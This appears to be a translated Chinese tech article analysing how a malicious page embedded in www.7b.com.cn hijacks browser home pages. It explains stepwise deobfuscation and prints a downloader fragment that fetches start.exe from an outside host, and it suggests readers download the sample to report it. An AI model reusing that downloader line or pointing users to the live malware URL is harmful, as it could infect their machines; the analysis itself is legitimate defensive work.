Not long ago, many netizens were infected with the virus of www.7b.com.cn, and the homepage was changed to this website, and it could not be changed back. How does a hacker lock the user's browser home page? Let's go and find out.
Reminder: There are certain risks in analyzing viruses. It is recommended to operate under virtual machines.
The first step is to view the source code of the homepage of www.7b.com.cn. You can find the following words at the end:
This is a page embedded in the homepage of the 7b website. That is, opening www.7b.com.cn will also open this page at the same time.
And "http://m.dashow.com.cn/m.html" represents a string, and "&#" is followed by the ASCII decimal value of each string.
Save this garbled directly as an HTM file, open it with IE, and you can see its true face "http://m.dashow.com.cn/m.html".
The second step is to view the source code of http://m.dashow.com.cn/m.html, replace the Execute in the script section with Document.Write, and then open the HTM page. There will be a piece of code. Similarly, replace EXECUTE with our invincible Document.Write, add the script mark before and after, and save the HTM. A dazzling thing immediately appeared on the screen. Organize the dazzling things and use the CHR() that appeared earlier. The effect is to convert the ASCII character into a character, but this time it is hexadecimal. Then stitch the characters into a string and then Execute to run the command string. Continue to replace EXECUTE with Document.Write, add script mark before and after, and save HTM.
The third step After the last few steps of restoration, I finally saw the final face of this malicious page.
on error resume next curl = "http://m.dashow.com.cn/start.exe"...and omitted later.
We can clearly see the link http://m.dashow.com.cn/start.exe in this code. That's right, it's a virus that can lock the user's homepage to www.7b.com.cn after running.
You can download this file with the download tool. If your anti-virus software can't find it, it is best to report it immediately. This will ensure that the anti-virus software quickly kills the virus and protects fewer netizens from the virus.
Windows 7 method for managing and disabling IE8 add-ons 1, management add-ons can be opened in th
An easy way to view the file extension In the use of a computer, sometimes we need to know what t
How to add clocks in different time zones for Windows 7 1. Left click on the time mark at the bot
broadband acceleration: release 20% of broadband resources reserved by computer I speed up broadba
How to close the operation center of Windows 7
Master does not pass the secret technology system software setup skills
Quickly configure different network parameters.
Making a Windows system that "does not invade"
Solutions to common faults in Windows systems
Partition your mobile hard disk with Windows' disk management tools
C disk space release 27 strokes! Use Vista without XP
Network integrated machine installation driver notes
Parsing Svchost.exe and Explorer.exe two major system processes
Explorer.exe has encountered a problem and needs to close the solution
Do you really use search engines? 7 strokes make you become a search expert
The reason the shared server is unstable or slow to open
How to renew the broadband online fee telecom broadband online renewal graphic tutorial
Working Directory Quick Jump Widget LinrLinks
Reasonable setting of Vista six common problems to solve
Set Win8 default browser to IE10 traditional desktop version
How does Win10 modify the theme color? Win10 set theme color method
Win10 touchpad gesture operation function introduction
Win10 Open or close the scrolling update message in the dynamic tile. Detailed tutorial
Windows 8.1 comes with screenshots can not be used how to do